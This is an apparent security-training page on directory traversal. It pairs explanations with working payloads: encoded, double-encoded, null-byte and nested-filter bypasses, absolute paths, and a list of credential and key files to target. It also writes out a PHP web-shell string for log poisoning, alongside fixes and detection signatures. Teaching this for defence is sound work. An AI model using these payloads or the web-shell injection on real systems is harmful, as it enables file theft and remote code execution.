Directory Traversal — Learn

Red Team · Easy

Directory Traversal

Understand how attackers escape the web root using path manipulation, access sensitive server files, and what developers must do to prevent it.

What is it?

Path Traversal Explained

A directory traversal vulnerability (also called path traversal or dot-dot-slash) allows an attacker to read files on the server that sit outside the intended web root directory. If a web application uses user-supplied input to construct file paths without proper sanitisation, an attacker can manipulate that input to access arbitrary files.

The classic payload is ../ — each ../ moves one directory up in the file system. By chaining these together, an attacker can reach the system root and read files like /etc/passwd, application configuration files, or private keys. In some cases, traversal leads directly to remote code execution when it can be combined with file upload or log poisoning techniques.

⚠️ Real-world impact: Directory traversal has been used to leak source code, database credentials, SSH private keys, and cloud API tokens from production servers. It appears regularly in CVE databases and is consistently found in penetration tests of web applications that handle file operations.

Foundations

How File Systems and Web Roots Work — and Why the Gap Exists

To understand directory traversal, you need a clear mental model of how web servers relate to the file system they run on. A web server is configured with a "document root" — a specific directory that it treats as the top-level location for serving files. Requests are supposed to map only to files within that directory. Everything outside it — system files, application source code, configuration files, private keys — is supposed to be invisible to the web.

The filing cabinet analogy: Imagine a company has thousands of filing cabinets throughout the building: personnel records in HR, financial records in accounting, contracts in legal, and a public-facing brochure rack in the lobby. The receptionist is authorised to hand out anything from the lobby brochure rack when visitors ask. A directory traversal vulnerability is like a receptionist who, when asked for "brochure number 5," blindly follows any path the visitor specifies. Ask for "../../../HR/personnel/employee_salaries" and the receptionist walks to the HR department and retrieves it — because they never verify that the path stays within the lobby. The access boundary exists in policy, but not in implementation.

The technical reason this happens is straightforward: the application builds the path as a plain string, and the operating system resolves the relative components only when the file is opened. When the server constructs a file path like /var/www/files/ + user input, and user input contains ../../../etc/passwd, the combined string /var/www/files/../../../etc/passwd is handed to the OS, which resolves it to /etc/passwd. The application had every opportunity to inspect the input, but unless it canonicalises the path and checks the result itself, nothing enforces the boundary: to the OS this is just another valid path.
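A minimal Python sketch of the concatenate-then-resolve behaviour described here. The base directory and payload come from the text; posixpath.normpath is used only to show, as a pure string operation, where the OS ends up when it walks the path (assuming no symlinks are involved).

```python
import posixpath

BASE_DIR = "/var/www/files/"          # intended serving directory (from the text)
user_input = "../../../etc/passwd"    # attacker-controlled value

# Naive concatenation: the application builds a string, nothing more.
combined = BASE_DIR + user_input

# normpath collapses ".." components lexically, which mirrors where the
# OS arrives when it opens this path (assuming no symlinks on the way).
resolved = posixpath.normpath(combined)

print(combined)   # /var/www/files/../../../etc/passwd
print(resolved)   # /etc/passwd
```

Nothing in the concatenation step fails or warns; the boundary is only visible if the code compares the resolved path with the base directory.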

What Lives Outside the Web Root — The High-Value Targets

The value of a directory traversal vulnerability depends on what sensitive files are accessible from the server. Understanding the typical Linux server file system layout is essential for knowing what to reach for:

/etc/passwd: User account list. Not passwords directly (the hashes are in /etc/shadow, which normally requires root), but it reveals usernames, home directories, and login shells, which is useful for targeted attacks.
/etc/shadow: Hashed passwords for all system users. Normally readable only by root (or a privileged group such as shadow on Debian-based systems), so a successful read means the web process is running with far too much privilege, which is itself a critical finding.
/etc/nginx/nginx.conf, /etc/apache2/apache2.conf: Web server configuration. Reveals virtual host configurations, upstream proxies, authentication mechanisms, and other application endpoints.
~/.ssh/id_rsa: SSH private key in the home directory of the web server user. The payload must spell out the real path (for example /home/ubuntu/.ssh/id_rsa), because ~ is expanded by shells, not by file APIs. If the key is readable and not passphrase-protected, it grants SSH access to any host that trusts the matching public key.
.env: Environment variables file used by many modern stacks (Laravel, Django, Node.js applications). Typically contains database credentials, API keys, secret keys, and cloud provider tokens.
Application source code (/var/www/app/config/database.php, /app/config.py): Hard-coded credentials, database connection strings, secret keys for signing tokens.
/proc/self/environ: Process environment variables for the running web process. Often contains secrets passed as environment variables in container environments.
/var/log/apache2/access.log: Web server access log. Useful for log poisoning attacks that combine traversal with RCE.

🚨 Cloud environments: In AWS, GCP, and Azure deployments, the instance metadata endpoint at http://169.254.169.254/ returns IAM credentials, instance identity, and configuration data. A Server-Side Request Forgery (SSRF) vulnerability, which is conceptually related to path traversal, can reach this endpoint and exfiltrate cloud credentials with account-level impact. Always test for SSRF alongside traversal in cloud environments.

How it works

The Mechanics

Consider a web application that serves user-selected files like this:

Vulnerable URL

https://target.com/download?file=report.pdf

The server constructs a path like: /var/www/files/report.pdf and returns the contents. Behind the scenes, the server code likely looks something like:

Vulnerable Server-Side Code (PHP example)

// Vulnerable: user input concatenated directly into path
$filename = $_GET['file'];
$path = "/var/www/files/" . $filename;
echo file_get_contents($path);
// No validation that $filename stays within /var/www/files/

If an attacker changes the parameter to a traversal sequence, the code concatenates it unchanged and the OS resolves it when the file is opened:

Traversal Payload

https://target.com/download?file=../../../../etc/passwd
# Server constructs: /var/www/files/../../../../etc/passwd
# OS normalises to:   /etc/passwd
# file_get_contents reads and returns /etc/passwd contents

Web applications often try to block this by filtering ../. Attackers have developed many bypass techniques to evade these naive filters — the root problem is that filtering strings is not the same as enforcing path boundaries.

💡 Windows path traversal: On Windows servers, the backslash form ..\ is the equivalent traversal sequence. Windows file APIs also accept forward slashes as separators, so ../ often works on Windows too. Windows-specific targets include C:\Windows\System32\drivers\etc\hosts, C:\inetpub\wwwroot\web.config, and C:\Windows\win.ini (a classic confirmation target because it is present on most installations).
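As a rough illustration of the Windows behaviour, Python's ntpath module applies Windows path rules on any platform. The base directory C:\inetpub\wwwroot\files is an assumed example, not something stated in the text.

```python
import ntpath

# Assumed serving directory, chosen only for illustration.
BASE_DIR = r"C:\inetpub\wwwroot\files"

payloads = [
    r"..\..\..\Windows\win.ini",   # backslash form
    "../../../Windows/win.ini",    # forward-slash form
]

for user_input in payloads:
    combined = BASE_DIR + "\\" + user_input
    # normpath treats "/" and "\" alike and collapses ".." components.
    print(ntpath.normpath(combined))   # C:\Windows\win.ini (both payloads)
```

Both separators lead to the same file, which is why a filter that only looks for ../ or only for ..\ is incomplete on Windows.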

Examples

Payloads in Practice

Example 01: Basic Traversal (No Filtering)

The most basic payload, which works when no filtering is in place. The number of ../ sequences needed depends on how deep the web root is in the file system. Using more than needed is harmless: the parent of the filesystem root is the root itself, so extra ../ sequences are simply absorbed. Six is usually enough to reach the root from a typical web root depth.

?file=../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
...
# www-data entry shows the account exists; it is the usual web server user on Debian/Ubuntu
# Any account with a login shell such as /bin/bash is a potential lateral movement target
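To illustrate why extra ../ sequences are harmless, the sketch below resolves payloads of different depths against an assumed base directory of /var/www/files. The resolve helper is hypothetical and exists only for this demonstration.

```python
import posixpath

BASE_DIR = "/var/www/files"   # assumed web file directory, three levels deep

def resolve(depth: int, target: str = "etc/passwd") -> str:
    """Join BASE_DIR with `depth` copies of '../' followed by target."""
    payload = "../" * depth + target
    return posixpath.normpath(posixpath.join(BASE_DIR, payload))

for depth in (2, 3, 6, 12):
    print(depth, resolve(depth))
# 2 /var/etc/passwd   (too few: still below the root)
# 3 /etc/passwd
# 6 /etc/passwd       (extra "../" are absorbed at the root)
# 12 /etc/passwd
```

Too few sequences miss the target, while any number at or above the real depth lands on the same file.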

Example 02: URL-Encoded Bypass

When a filter checks the raw request for the literal string ../ before the value has been URL-decoded, encoding the characters bypasses the string match. The web server or framework decodes the URL before passing the parameter to the application, so the application receives the decoded traversal sequence, but the string filter has already checked the encoded version and found no match.

The invisible ink analogy: The filter is looking for visible blue pen markings. Writing the same message in invisible ink passes the filter. The reader (the OS path resolver) still reads the ink. URL encoding is invisible ink for string filters.

?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd
# %2e = .  (dot)
# %2f = /  (forward slash)
# Decodes to: ../../etc/passwd
# String filter saw: %2e%2e%2f — no match for "../" — passes
# OS receives: ../../etc/passwd — traversal executes

# Variant: encode only the slash, leave dots literal
?file=..%2f..%2fetc%2fpasswd

# Variant: encode only the dots
?file=%2e./%2e./etc/passwd
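The filter-then-decode ordering can be reproduced in a few lines of Python. naive_filter is a hypothetical stand-in for a blocklist that inspects the raw, still-encoded value; urllib.parse.unquote plays the role of the later decoding stage.

```python
from urllib.parse import unquote

def naive_filter(raw_value: str) -> bool:
    """Hypothetical blocklist: accept the value unless it contains '../'."""
    return "../" not in raw_value

payloads = [
    "../../etc/passwd",                  # literal form: caught by the filter
    "%2e%2e%2f%2e%2e%2fetc%2fpasswd",    # dots and slashes encoded
    "..%2f..%2fetc%2fpasswd",            # only slashes encoded
    "%2e./%2e./etc/passwd",              # only the first dot of each pair encoded
]

for raw in payloads:
    passed = naive_filter(raw)   # the filter inspects the undecoded value
    decoded = unquote(raw)       # a later stage decodes before building the path
    print(f"{raw!r}: passes_filter={passed}, decoded={decoded!r}")
```

Every encoded variant passes the filter and decodes to the same ../../etc/passwd, which is the core of the bypass.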

Example 03: Double-Encoded Bypass

Some WAFs and security filters decode the URL once before checking it, then the application server decodes it a second time. Double encoding exploits this two-decode pipeline: the filter checks the single-decoded version (still encoded), passes it, and the application receives the fully decoded traversal sequence.

# %25 is the URL encoding of % itself
?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd
# WAF decodes once: %2e%2e%2f%2e%2e%2fetc%2fpasswd  — no "../" → passes
# App server decodes again: ../../etc/passwd → traversal executes

# Breakdown:
# %252e → %2e → .
# %252f → %2f → /
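A short Python sketch of the two-decode pipeline, using the payload from this example. decode_fully is a hypothetical helper showing one way a filter could avoid the mismatch by decoding until the value stops changing; the round limit is an arbitrary assumption.

```python
from urllib.parse import unquote

raw = "%252e%252e%252f%252e%252e%252fetc%252fpasswd"

once = unquote(raw)     # what a filter sees if it decodes exactly once
twice = unquote(once)   # what the application sees after a second decode

print(once)    # %2e%2e%2f%2e%2e%2fetc%2fpasswd
print(twice)   # ../../etc/passwd

def decode_fully(value: str, max_rounds: int = 5) -> str:
    """Decode repeatedly until the value stops changing (bounded rounds)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

print(decode_fully(raw))   # ../../etc/passwd
```

The bypass exists only because the checker and the consumer disagree on how many times the value has been decoded.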

Example 04: Null Byte Termination (Legacy PHP)

In PHP versions prior to 5.3.4, filesystem functions passed filenames to the underlying C library, where a null byte (%00) terminates the string, even though PHP itself treated the full string as the filename. This allowed bypassing extension checks: the application validates that the filename ends in .jpg, but the OS opens the path only up to the null byte and ignores everything after it.

?file=../../../../etc/passwd%00.jpg
# PHP extension check: filename ends in ".jpg" → passes validation
# C-level fopen() call: string terminates at \x00 → opens /etc/passwd
# The ".jpg" suffix is never seen by the OS

# Modern PHP is not vulnerable — patched in PHP 5.3.4 (2010)
# Still relevant for: legacy apps, embedded systems, some ICS software
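The mismatch between the application's view and the C-level view of the string can be simulated in Python. This is an illustration only: extension_check and c_string_view are hypothetical helpers, and the truncation is simulated rather than performed by a real C call.

```python
def extension_check(filename: str) -> bool:
    """Stand-in for the application-level check that the name ends in .jpg."""
    return filename.endswith(".jpg")

def c_string_view(filename: str) -> str:
    """Simulate a C API reading the string: it stops at the first NUL byte."""
    return filename.split("\x00", 1)[0]

def reject_nul(filename: str) -> str:
    """A simple guard: refuse any filename that contains a NUL byte."""
    if "\x00" in filename:
        raise ValueError("NUL byte in filename")
    return filename

payload = "../../../../etc/passwd\x00.jpg"   # %00 after URL decoding

print(extension_check(payload))   # True
print(c_string_view(payload))     # ../../../../etc/passwd
```

The two functions disagree about what the filename is, and that disagreement is the vulnerability. Current Python itself refuses such paths: open() raises ValueError for an embedded null byte.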

Example 05: Filter Stripping Bypass (Non-Recursive Removal)

Some developers implement traversal filters by removing ../ from user input rather than rejecting the request. If the removal is not recursive, an attacker can nest the traversal sequence so that removing the inner ../ reconstructs it from the outer characters.

The word puzzle analogy: If a filter removes the word "bad" from every string, submitting "bbadad" produces "bad" after the first removal pass. The filter ran once and stopped. Nested traversal payloads work the same way.

# Filter removes "../" once, left to right
?file=....//....//etc/passwd
# Filter removes the inner "../": ....// → ../ after removal
# Result after filtering: ../../etc/passwd → traversal executes

# Variant with the "../" nested at a different offset:
?file=..././..././etc/passwd
# Filter removes the inner "../": ..././ → ../ after removal
# Result after filtering: ../../etc/passwd → traversal executes
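The single-pass removal can be checked directly in Python, where str.replace makes one left-to-right pass over non-overlapping matches. strip_once and strip_until_stable are hypothetical names for the flawed filter and a repeated variant.

```python
def strip_once(value: str) -> str:
    """Single-pass removal, as in the flawed filter described here."""
    return value.replace("../", "")

def strip_until_stable(value: str) -> str:
    """Repeat the removal until no '../' remains."""
    while "../" in value:
        value = value.replace("../", "")
    return value

for payload in ("....//....//etc/passwd", "..././..././etc/passwd"):
    print(payload, "->", strip_once(payload), "|", strip_until_stable(payload))
# ....//....//etc/passwd -> ../../etc/passwd | etc/passwd
# ..././..././etc/passwd -> ../../etc/passwd | etc/passwd
```

Repeating the removal closes this particular gap, but it is still string filtering: it does nothing about absolute paths or about values that are decoded after the filter runs.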

Example 06: Absolute Path Injection

Some applications filter relative traversal sequences (../) but don't prevent absolute paths. If the user-controlled parameter is passed directly to a file-reading function without any path prefix being prepended, supplying an absolute path bypasses traversal filters entirely — there's nothing to traverse.

# Application code (vulnerable):
$path = filter_traversal($_GET['file']);  // removes "../"
readfile($path);                          // but accepts absolute paths!

# Payload — no traversal needed, absolute path used directly:
?file=/etc/passwd
root:x:0:0:root:/root:/bin/bash ...

# Also try:
?file=/etc/nginx/nginx.conf     → web server config + virtual hosts
?file=/home/ubuntu/.ssh/id_rsa  → SSH private key → direct server access
?file=/var/www/html/.env        → application secrets
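A small Python sketch of why a traversal-stripping filter does nothing against an absolute path. strip_traversal is a hypothetical stand-in for the filter_traversal() call in the snippet; the last line shows a Python-specific detail, not a claim about PHP.

```python
import posixpath

def strip_traversal(value: str) -> str:
    """Hypothetical stand-in for filter_traversal(): removes '../' until stable."""
    while "../" in value:
        value = value.replace("../", "")
    return value

payload = "/etc/passwd"
filtered = strip_traversal(payload)

print(filtered)                    # /etc/passwd (unchanged: nothing to strip)
print(posixpath.isabs(filtered))   # True

# Python-specific: join() discards the base when the second part is absolute,
# so prepending a base directory with join() alone does not help either.
print(posixpath.join("/var/www/files", filtered))   # /etc/passwd
```

Rejecting absolute input is a useful early check, but the robust control remains comparing the resolved path against the base directory.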

Real-World Scenarios

Traversal in Production Environments

Scenario A: The Document Download Portal (Credentials in .env)

A healthcare company runs a document management portal that allows authenticated users to download their own records. The download endpoint takes a filename parameter and serves files from /var/www/portal/documents/. A penetration tester notices the parameter in Burp and tests a basic traversal payload.

The /etc/passwd attempt returns content, confirming the vulnerability. Moving up the chain, the tester tries ../../../../var/www/portal/.env — the application's environment variable file. It contains the database hostname, username, and password, the application's JWT secret key (allowing arbitrary token forging), and an AWS S3 access key with access to the company's document storage bucket.

From one traversal vulnerability in a download endpoint, the tester has: database credentials, the ability to forge auth tokens as any user, and cloud storage access containing every patient document in the system. This is a complete data breach from a single file read.

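🚨 HIPAA implication: Reading a .env file that contains credentials to a database holding PHI puts protected health information within reach of an unauthorised party, and may itself have to be treated as a security incident involving PHI. Whether it is a reportable breach depends on the organisation's risk assessment under the HIPAA Breach Notification Rule, even if no patient records were read directly via the traversal.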

Scenario B: Traversal to Remote Code Execution via Log Poisoning

An attacker finds directory traversal on a PHP application and can read /var/log/nginx/access.log. Critically, the vulnerable parameter is passed to include (or require) rather than to a plain read function such as file_get_contents, so whatever file it points at is parsed as PHP. The attacker then sends a crafted HTTP request where the User-Agent header contains PHP code: User-Agent: <?php system($_GET['cmd']); ?>. This request is logged verbatim to the access log.

Now the attacker uses the traversal to load the log file, but appends a command parameter: ?file=../../../../var/log/nginx/access.log&cmd=id. Because the file is included rather than merely read, the PHP interpreter executes the embedded code. The server runs id and its output appears in the response. Directory traversal has escalated to Remote Code Execution.

This chain (traversal → log poisoning → RCE) is a well-documented attack pattern. It elevates traversal from a "file disclosure" finding to a "full server compromise" finding and typically moves the CVSS rating from High to Critical.

Scenario C: CVE in a Widely-Used Library (Traversal at Scale)

Traversal vulnerabilities are not only found by testers in custom applications. They also appear in widely-used software packages and are assigned CVEs that affect thousands of deployments simultaneously. CVE-2021-41773 (Apache HTTP Server 2.4.49) was a path traversal vulnerability that allowed unauthenticated attackers to read files outside the document root and, in configurations with CGI enabled, execute arbitrary code. It was already being exploited in the wild when it was disclosed.

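A similar pattern occurred in VPN and network appliance products, including Fortinet FortiOS (CVE-2018-13379), Pulse Connect Secure (CVE-2019-11510), and Cisco ASA (CVE-2020-3452), each of which allowed unauthenticated file reads. Widely exploited flaws of other classes, such as CVE-2019-18935 (insecure deserialisation in Telerik UI for ASP.NET AJAX) and CVE-2018-1000600 (credential exposure in the Jenkins GitHub plugin), teach the same operational lesson even though they are not traversal bugs. Each affected organisations that were running unpatched software. The lesson for defenders: directory traversal is not only a custom code problem. Dependency and network appliance patch management is equally important.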

⚠️ Detection note: Unencoded traversal attempts stand out in web server logs: strings like ../, %2e%2e, and /etc/passwd in request parameters are strong attack signatures. Double-encoded and other obfuscated variants need the logged value to be decoded before matching. Web Application Firewalls and SIEM rules for these strings should be standard in any security monitoring setup.
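A detection rule along these lines might look like the following Python sketch. The pattern list, the decode limit, and the sample request targets are all assumptions chosen for illustration; a production rule set would be broader and tuned against false positives.

```python
import re
from urllib.parse import unquote

# Assumed signature list: traversal sequences plus two well-known target files.
SUSPICIOUS = re.compile(r"\.\.[/\\]|/etc/passwd|win\.ini", re.IGNORECASE)

def decode_fully(value: str, max_rounds: int = 3) -> str:
    """URL-decode repeatedly so double-encoded payloads are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_suspicious(request_target: str) -> bool:
    """Flag a logged request target that matches a traversal signature."""
    return bool(SUSPICIOUS.search(decode_fully(request_target)))

samples = [
    "/download?file=report.pdf",
    "/download?file=../../../../etc/passwd",
    "/download?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd",
    "/download?file=%252e%252e%252fetc%252fpasswd",
    "/download?file=..%5c..%5cWindows%5cwin.ini",
]

for target in samples:
    print(is_suspicious(target), target)
```

Only the first sample is reported as clean. Decoding before matching is what lets one pattern cover the plain, encoded, and double-encoded forms.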

Security Implications

What Path Traversal Means for Infrastructure Security

A single traversal vulnerability is a master key. Every file readable by the web server process is exposed: configuration files, credentials, source code, private keys, log files. The scope is not limited to "some user data" — it's the entire server file system accessible to the process.
Traversal findings often cascade. Credentials found in .env files unlock databases, cloud accounts, and third-party APIs. SSH keys found in home directories unlock direct shell access. JWT secrets found in config files unlock authentication bypasses. A single traversal exploit often yields multiple critical follow-on findings.
Principle of least privilege limits blast radius. The web server process should run as a user with the minimum permissions needed — no access to SSH keys, no access to other users' home directories, no read access to files outside the web root. If the web process can't read /etc/shadow, traversal to it fails regardless of whether the vulnerability exists. Process isolation and file permissions are a critical compensating control.
The correct fix is allowlist-based path validation. Filtering ../ is a blocklist approach that keeps being bypassed with new encodings and techniques. The correct defence: resolve the full canonical path first using realpath() or equivalent, then verify the resolved path starts with the canonical base directory followed by a path separator (so that /var/www/files_old does not pass as /var/www/files). If it doesn't match, reject the request. Because the check runs on the path the OS will actually open, it does not depend on recognising any particular encoding or filter bypass.

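💡 Secure fix example: $base = realpath('/var/www/files') . DIRECTORY_SEPARATOR; $real = realpath($base . $input); if ($real === false || strpos($real, $base) !== 0) { http_response_code(403); exit('Access denied'); } This resolves all traversal sequences before checking the path, so encoding tricks that survive URL decoding no longer matter. realpath() returns false for paths that do not exist, and that case is rejected explicitly.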
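The canonicalise-then-check defence described in this section can also be sketched in Python. This is an illustration under assumptions, not the code a real application would ship: safe_resolve is a hypothetical helper name, and a temporary directory stands in for /var/www/files.

```python
import os
import tempfile

def safe_resolve(base_dir: str, user_input: str) -> str:
    """Return the canonical path if it stays inside base_dir, else raise."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_input))
    # commonpath compares whole path components, so a sibling such as
    # <root>/files_old is not mistaken for something inside <root>/files.
    if os.path.commonpath([base, candidate]) != base:
        raise PermissionError(f"path escapes base directory: {user_input!r}")
    return candidate

with tempfile.TemporaryDirectory() as root:
    base = os.path.join(root, "files")
    os.mkdir(base)
    with open(os.path.join(base, "report.pdf"), "w") as fh:
        fh.write("demo")

    print(safe_resolve(base, "report.pdf"))   # canonical path inside base
    for bad in ("../../../../etc/passwd", "/etc/passwd", "../files_old/x"):
        try:
            safe_resolve(base, bad)
        except PermissionError as exc:
            print("rejected:", exc)
```

The check operates on the resolved path, so it treats relative traversal, absolute paths, and look-alike sibling directories the same way. The input is assumed to have been URL-decoded already by the framework.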

Key Concepts

What You Need to Know

📁

Web Root

The directory a web server is configured to serve files from. Traversal attacks escape this boundary to reach the broader file system — system configs, keys, application secrets.

🔗

Path Normalisation

The OS resolves ../ when the file is opened, after any string filter has already run. Secure code must normalise (canonicalise) paths first with realpath() and then validate the result, rather than filtering strings before normalisation.

🛡️

Allowlist Validation

The correct fix: resolve the full canonical path, then verify it starts with the intended base directory. This is encoding-agnostic and defeats the string-level bypasses covered in the examples.

🎯

High-Value Targets

/etc/passwd, .env, SSH keys, web server configs, application source, /proc/self/environ. Each can cascade into further compromise.

🔒

Least Privilege

Web processes running as root make traversal catastrophic. Running as a dedicated low-privilege user limits accessible files to only what the web app needs — containment by design.

🧪

Log Poisoning RCE

Traversal + a log file the application includes as code = potential RCE. Inject PHP into a log via User-Agent, then load the log through the vulnerable include. Escalates from file disclosure (High) to code execution (Critical).

🖥️

Windows Traversal

Use ..\ on Windows servers. Target C:\Windows\win.ini for confirmation, web.config for credentials.

📡

CVE Awareness

Traversal appears in CVEs for web servers, VPNs, and frameworks, not only custom code. Apache 2.4.49, Fortinet FortiOS, and Cisco ASA are documented examples. Patch management is a traversal defence.

💡 OWASP: Directory traversal falls under A01:2021 Broken Access Control, the top category in the OWASP Top 10 2021. The inability to enforce file access boundaries is a fundamental access control failure.
